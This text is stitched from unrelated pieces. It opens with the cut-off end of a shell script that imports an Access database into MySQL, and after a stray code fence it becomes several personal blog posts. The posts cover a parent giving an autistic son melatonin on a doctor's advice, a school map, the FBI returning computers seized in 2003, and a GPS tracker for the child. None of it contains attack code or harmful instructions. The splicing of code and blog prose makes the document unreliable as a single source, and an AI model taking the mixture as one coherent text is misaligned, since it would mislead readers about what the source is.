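    printf '[client]\nhost=%s\nuser=%s\npassword="%s"\n' "$1" "$2" "$3" > "$cnf"
    printf '%s\n' "$cnf"
}

# Create the schema, then load each table separately. Prints the number of
# tables loaded and returns non-zero at the first failure.
import_mdb() {  # usage: import_mdb FILE.mdb DATABASE OPTION_FILE
    mdb=$1 db=$2 cnf=$3 status=0 count=0
    work=$(mktemp -d) || return 1
    : > "$work/tables"
    # Each stage writes to a file so its exit status can be checked;
    # in a plain pipeline only the last command's status is visible.
    mdb-schema "$mdb" mysql > "$work/schema.sql" \
        && mysql --defaults-extra-file="$cnf" "$db" < "$work/schema.sql" \
        && mdb-tables -1 "$mdb" > "$work/tables" || status=1
    # One table name per line, so names with spaces or commas stay intact.
    while [ "$status" -eq 0 ] && IFS= read -r table; do
        [ -n "$table" ] || continue
        if mdb-export -I mysql "$mdb" "$table" > "$work/data.sql" < /dev/null \
            && mysql --defaults-extra-file="$cnf" "$db" < "$work/data.sql"
        then
            count=$((count + 1))
        else
            echo "import failed at table: $table" >&2
            status=1
        fi
    done < "$work/tables"
    rm -rf "$work"
    echo "$count"
    return "$status"
}

# Run only when called as: script FILE.mdb DATABASE HOST USER
if [ "$#" -eq 4 ]; then
    printf 'MySQL password: ' >&2
    stty -echo; IFS= read -r pw; stty echo; echo >&2
    cnf=$(write_client_cnf "$3" "$4" "$pw") && import_mdb "$1" "$2" "$cnf"
    rc=$?
    rm -f "$cnf"
    exit "$rc"
fi
```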

How do you feel about drugging your kid?

It's no secret that our son has sleep problems. I had (hah! okay, so HAVE) severe sleep issues, and he does too.

We followed all the rules. Feed him early, give him a pre-bed snack. Bathing (not generally a relaxing experience for anyone around here). Warm "milk" (for us, it'd be rice or almond milk, as he's got casein and soy allergies). Making the whole house quiet before bed. Reading stories. Withholding nap time. Waking him early. Tiring him out.

Generally, he'll go to bed around 1-2am without assistance. Unless we have a long, dark car ride (for me these days with severe complex sleep apnea, these are really dangerous to do, so that's not happening – my sleep doctor's directives currently state that I should not be driving late at night) he'll usually be up and active the whole time. I often joke that the US could be independent of fossil fuels if we find a way to tap into his energy.

So after discussions with his doctor, we use an as-needed dose of Melatonin at night (we call them 'Magic Gummies', as they are in gummy form, like his vitamins), for about a year and a half now. I also use it periodically – while I have little trouble falling asleep at the wheel, I have problems falling asleep at night – in part because I use so much caffeine to stay awake and effective during the day. Yeah, in my case it's a self destructive loop, and I'm seeking medical intervention for my complex sleep apnea (3rd sleep study tomorrow, maybe it'll be the one where we find the right machine and settings for me!). But when I was a child, I had more or less identical sleep issues, so it's not JUST the caffeine.

Anyway, so it works great, and his teacher, aide and therapists can tell when he's been using it, and when we've had to get him to sleep naturally. But that doesn't stop people from judging us for using it. People give us looks of disapproval, or ask stuff like 'do you really have to drug your kid?' or *insert anecdote about someone else here*, then some judgmental comment about drugging him. Not just acquaintances, and friends, but family. It sucks, and it's stupid, and hurtful.

We've always treated it as a privilege, not some sort of punitive consequence. In fact, if he's been 'bad', we make him do something good to redeem himself in order to get one – like pick up a toy, or get mommy a glass of water, etc. They don't have a negative stigma attached here. We've never overtly told him what they're for, but that they're a special treat for 'good boys' on 'special nights'. We've gone out of our way to avoid saying what they're for, lest he protest taking them because he wants to stay up and play.

Lately he's been kind of warily asking for them proactively. I told Becky I suspect he knows what they are for and recognizes his need for one. She was skeptical, but tonight I asked him offhand – 'do you know what the magic gummies are for?'.

He says 'they help go night night'.

Damn right they do, kid.

My kid knows he needs help to fall asleep, and actively seeks it. I couldn't think of a more powerfully obvious statement of self advocacy than that.

So how do I feel about drugging my kid? I feel great, because I know I'm helping him satisfy a basic human need that he is now directly articulating his need for. I feel like our choice to give him this powerful tool to help him sleep has helped him behaviorally, educationally, and has soothed him when he was tired, sore and weary. And that our feelings that he would approve of the use of them if he understood what they were for have been validated.

I'd be off to take a magic gummy myself, but due to my upcoming sleep study (I'll have a whole post on this mess soon, once it's completely dealt with, because boy, it's been a long, strange ride) I'm not supposed to be doing that, so I'll go lie down and hope sleep comes quickly. Goodnight, all!

A helpful guide to my elementary school

So I wanted to write a piece for Autistics Speaking Day. I wrote this blog post that was well over 2100 words, and spoke to the idea of making sure that if a child is different, don't be their first bully. It went far deeper into things than I really feel comfortable talking about in public (not so much about my parents, who despite their faults are/were generally okay, but more about the absolutely hellish experience I had in elementary school – kindergarten through 6th grade. It spoke about involuntary restraint, seclusion, bullying (just about as much by the adults and the system as the kids), acting out violently, and wandering.)

I decided instead to publish this. I drew a helpful map of my old elementary school for non-typical children like I was, so they can easily navigate their days like I was able to. It's not really comprehensive, but it's a start.

A helpful guide to my elementary school

(Needless to say, I know exactly what to be hyper vigilant for as my child goes through school. And I know that my child's school nowadays has acceptable procedures for handling many of the issues I dealt with as a kid.)

The difference 2 words make

 

 

 

For the past nearly 10 years, I've been patiently waiting for a single event to happen. In November 2003, a ton of my personal belongings walked out the door of my apartment. I was told to forget about them forever. That the government would find a way to keep them, destroy them, or auction them.

I made it my personal goal to get that equipment back. I didn't have a lot of resources to fight that battle, and I still don't. Lawyers cost tons of money, far more than the equipment could ever be worth. But what walked out that day wasn't just a pile of equipment. It was 100% of my personal data I had ever collected, EVER, in the time I had computers. In that collection is floppy disks, hard drives, zip disks, DAT tapes, basically everything I had ever done from the time I first laid hands on a keyboard (or video camera, as they took all my VHS-C and SVHS tapes with raw footage on them too). I never really shot analog, so every photo I had ever taken, from my Polaroid PDC 640 onward, gone. I think I even have webcam shots, and pictures from our school's Sony Mavica in this pile of computers. Tons of scanned photos that were taken by others, from my first flatbed scanner.

Logs from some of the first BBSes I ever connected to. Some of the first programs I ever wrote.

And what they told me on that November day, is that all of this was gone forever. Even the stuff I wrote the week before. Back then we didn't have a cloud like you kids have nowadays. We had a garden hose and a sprinkler, and we got our rainbows that way, and we liked it… But seriously. If you woke up and someone said "all your stuff is stolen. We know where it is, but you'll never see it again. You need to let go and start over…."

Sure, you're thinking – why didn't you back it up? I did. On all the media that went out the door with it. DVD-RW, gone. DAT backups? gone. If it plugged into the wall, or stored a magnetic charge, it was fair game. They took my dreamcast games, for crying out loud.

So for years, I've been bugging the FBI any way I know how to find out where my belongings are, so I can go back and get them. For years, I'd get bounced around. I'd get referred to people who couldn't help. Irritated, I filed a FOIA/PA request, hoping to find any information about the whereabouts of my belongings (among other things). I was dismayed to find no information about the whereabouts of my belongings in the files.

But obviously it triggered something. I filed the request in July of 2012, and the response was (after a month of research time), well… literally stating that my FBI file was larger than the Bible. I got several CDROMs, which had interesting information (including the fact that they unsuccessfully continued to attempt to indict me for other crimes (I also did not commit) until 2009 with a standing grand jury. Yes, they had continued to fight to prosecute me for over 6 years afterward.). But nothing at all about the seizure except some notes they took during the raid.

I got my last CD from them in late December of 2012. In February 2013, I get a very upset call from Becky. "An FBI agent just left me a voicemail, he's looking for *YOU AND ME!* He didn't say why.". Obviously I immediately backed up a copy of everything I had offsite, then grabbed my phone and called the agent back, expecting the worst. … "I have some items we're looking to return to you. I need you to fill out some forms."

I don't have to tell you at this point my jaw just about hit the floor.

He went on to tell me about all these computers they found in a warehouse. Ones that belonged to me, from a case in 2003. I told him where to send the paperwork.

I get the letters a bit later, and my heart sank. They were authorization to return my computers, CONDITIONAL ON MY CONSENT TO WIPE THE DRIVES.

Because what I really want is the kind of computer I could afford in 2003, with no data on it. Yeahhhhhh.

It had a 30 day deadline. I redlined the sections providing consent to wipe the drives, initialed them and signed them, and sent them to the agent.

He calls and explains policy, and procedure. Tells me how lucky I am since "they don't have to return anything, according to my plea bargain"

I start to grin. Here's the turning point in that conversation.

Me: "Actually, according to my plea bargain, there's only one computer you don't have to return. The rest, I'm constitutionally entitled to due process to receive."

Agent: "Plea bargains always contain a forfeiture clause. It states we can dispose of the seized items however we like. We just like to give the opportunity to return them."

Me: "Mine, you'll find, is worded differently. The change is subtle, but important. Can you pull mine up, and read the first sentence of the forfeiture clause to me?"

Agent: "'The defendant forfeits and otherwise waives any ownership right in all items involved in the acts alleged in the Bill of Information or Bill of Indictment.' Now see, I told you…"

Me: "Read Adam's Forfeiture clause. His is the boilerplate one. He had much bigger fish to fry than I did."

Agent: "*murmuring to himself as he read it, tried to compare it*. 'I don't see the difference here.'."

Me: "I'll fax over a copy for your review, so you can see the difference. This was specifically negotiated, and I should be able to enforce it in court."

Agent: "I'm just trying to do my job, and close this case out."

Me: "I understand that, but I had a deal with the US government, and they can't try to get out of their obligations under the agreement just because they're inconvenient 10 years later. This is a written and enforceable contract, and this was an inseparable part of the deal. I can't go and un-serve probation, and the government can't change their mind after the fact"

Agent: "If you can fax me the highlighted sections, I'll run this by my boss."

Me: "No problem, I'm hitting send on the fax right now. Talk to you soon!"

My lawyer thought I was crazy for worrying about this, but I demanded a 2 word change in the plea bargain. The prosecutor was anxious to close the deal, and figured it was a very minor change, he assured me it 'only changed the wording, as I'd get back anything not used in the crime anyway'. I knew otherwise.

Adam's forfeiture language
My forfeiture language

Suddenly, the change is clear, isn't it? The court only had the right to dispose of one computer – the laptop used to connect to the Lowe's network to check my email.

Small problem for them – They never bothered doing forensics on any of my data.

The FBI agent calls back a few days later, says this is all well and good, but there's over 40 hard drives and do I really expect them to do forensics on the drives to determine what was used in the crime and what wasn't? ABSOLUTELY. I offered to tell them the serial number of the laptop used to connect to the wifi, to let them wipe that, but they stated they couldn't just take my word for it.

Then, I said, they'd better dust off their copies of encase, and get to work. Because "it'd look stupid if you had to tell a judge you didn't want to honor my civil rights because it's really hard, and time consuming, but not important enough to do over the past 10 years we've had the data"

I didn't hear from them for a few months. I figured they were mulling their options.

…3 months later…

A very upset call from Fedex to my cell phone. Apparently I missed a dropoff. And the items were very, very large. And they were not pleased about that.

"Where are the items shipping from?"

"US Department of Justice, Western District of North Carolina…. Sounds like these are important, huh?"

"That's an understatement. My wife was at an appointment, she'll be home all day tomorrow. Can you reattempt delivery then?"

"Sure. Thanks for choosing FedEx!"

I got a call from Becky the next day. Apparently, the packages were too large for the FedEx delivery driver to carry himself. Becky had to help unload and carry them. Inside, were hundreds of pounds of equipment, paperwork, videotapes, CDs, … everything. Untouched.

Over the last month, I've been firing up machines one by one, and finding to my amazement that after a decade in storage, 100% of the data was intact and recoverable. I haven't gotten to the floppy disks yet, but my Kryoflux controller should make short work of that. Then my professional grade editing SVHS deck should make viewing the videotapes a snap.

I leave you with a celebratory posting of the oldest photo I can find of myself – this is from October of 2000, on my last day at Isiah.com before they went out of business. I looked like a dweeb back then.

paul n richard

Welcome to the wonderful world of specialists!

So we got a call from Henry Ford's Center for Autism and Developmental Disabilities. They got the paperwork! (Well, that was actually a separate call earlier this week, letting me know they got it and didn't forget about us…) And they were happy to let me know that they were wanting to set Billy up for the next available appointment date.

I of course asked when that was.

"October 16th! We have an opening at 9am and noon!"

"… what? That's your earliest date?"

"Yes. We can add him to the cancellation list too, something might come up earlier, it happens from time to time"

"ok. Well, he'll be in school for a few months by then, so let's schedule it after class so it's less disruptive to his schedule. noon sounds great."

sigh.

Could be worse, a parent on MyAutismTeam commented on my post there saying U of M is scheduling appointments 2 YEARS OUT. TWO WHOLE YEARS. Good lord.

Anyway, we also ordered this today. Cellular based GPS tracker should be good for when we're camping this summer. Last summer we had a minor incident where he wandered 3 rows of tents down to play with someone else's dog. Back then he was essentially nonverbal so it was extra scary. Now, he'll have GPS tracking, be trained how to swim (which he gets better at every day, 18 weeks of formal 1:1 training and swimming 3 times a week will do that, I guess!), and be equipped with a PECS to help him communicate where words fail him.

We still plan on using the teddy bear beacon/tracker for times when we expect him to try to wander off (like at Eastern Market, or at the fireworks, both of which he loves, but also loves to try to seek his own path, which obviously is unacceptable!), but the GPS will give us peace of mind if he disappears at times we don't expect him to. The GPS duty cycle and battery is supposedly good for 3 days. If we're good about keeping it plugged in at night, this should be perfect for essentially 24/7 monitoring. Not sure where we'll attach it yet, I may have to make it a waterproof shoe case. I wish I could just strap it to his ankle like a criminal's tether, but I can see him trying to focus every bit of energy on getting that off him posthaste, damaging it if necessary. (If he's one thing, it's clever and determined!)

The personal website of Paul Timmins – Telecommunications expert, father.